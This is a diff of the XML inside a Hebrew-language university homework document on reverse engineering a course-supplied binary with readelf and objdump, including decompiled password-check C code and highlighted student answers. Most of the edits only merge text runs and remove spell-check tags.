--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,76 +453,56 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> טאוב</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מצאתם על הרצפה דיסק-און-קי חשוד</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>. על הדיסק-און-קי</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>טאוב</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>באת"מ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> מצאתם על הרצפה דיסק-און-קי חשוד</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>. על הדיסק-און-קי</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -555,7 +535,6 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -563,32 +542,13 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>המוצרף</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -598,31 +558,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump, readelf</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -666,7 +608,6 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -674,7 +615,6 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -754,17 +694,8 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Engenering</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Reverse Engenering</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -874,34 +805,14 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -h </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>verySecretProgram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>readelf -h verySecretProgram</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -1023,34 +934,31 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>readelf -h verySecretProgram</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, קיבלנו שמספר ה-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -h </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>verySecretProgram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>program headers</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -1058,42 +966,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>, קיבלנו ש</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>מספר ה-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>program headers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> הוא 9</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> הוא 9.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2079,7 +1952,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>939f10300000000</w:t>
+        <w:t>000000000939f103</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2113,7 +1986,6 @@
         </w:pBdr>
         <w:bidi/>
         <w:rPr>
-          <w:rFonts w:hint="cs"/>
           <w:color w:val="000000"/>
           <w:rtl/>
         </w:rPr>
@@ -2232,7 +2104,6 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2240,7 +2111,6 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2263,18 +2133,8 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>להשתחזר</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2430,41 +2290,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPasswordAux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2524,7 +2350,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2545,7 +2370,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2574,7 +2398,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2605,7 +2428,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2752,7 +2574,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2773,7 +2594,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2926,20 +2746,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(c){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2986,18 +2794,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve"> &amp; 1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3009,7 +2806,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3088,7 +2884,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3109,7 +2904,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3346,41 +3140,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3466,29 +3226,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPasswordAux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(s) &gt;</w:t>
+        <w:t>(checkPasswordAux(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3500,7 +3238,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3521,7 +3258,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3752,7 +3488,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3773,7 +3508,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3938,18 +3672,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>___</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>_</w:t>
+        <w:t>____</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3961,7 +3684,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4116,7 +3838,6 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4135,18 +3856,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t xml:space="preserve">y &gt; </w:t>
+        <w:t xml:space="preserve">(y &gt; </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4577,7 +4287,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4585,7 +4294,6 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4775,25 +4483,7 @@
             <w:rtl/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>פרצת</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cstheme="minorHAnsi"/>
-            <w:rtl/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cstheme="minorHAnsi"/>
-            <w:rtl/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>אבטחה</w:t>
+          <w:t>פרצת אבטחה</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -4911,29 +4601,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>main(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
+        <w:t xml:space="preserve"> main(){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4976,20 +4644,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>password[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> password[</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5031,32 +4687,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5098,32 +4730,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
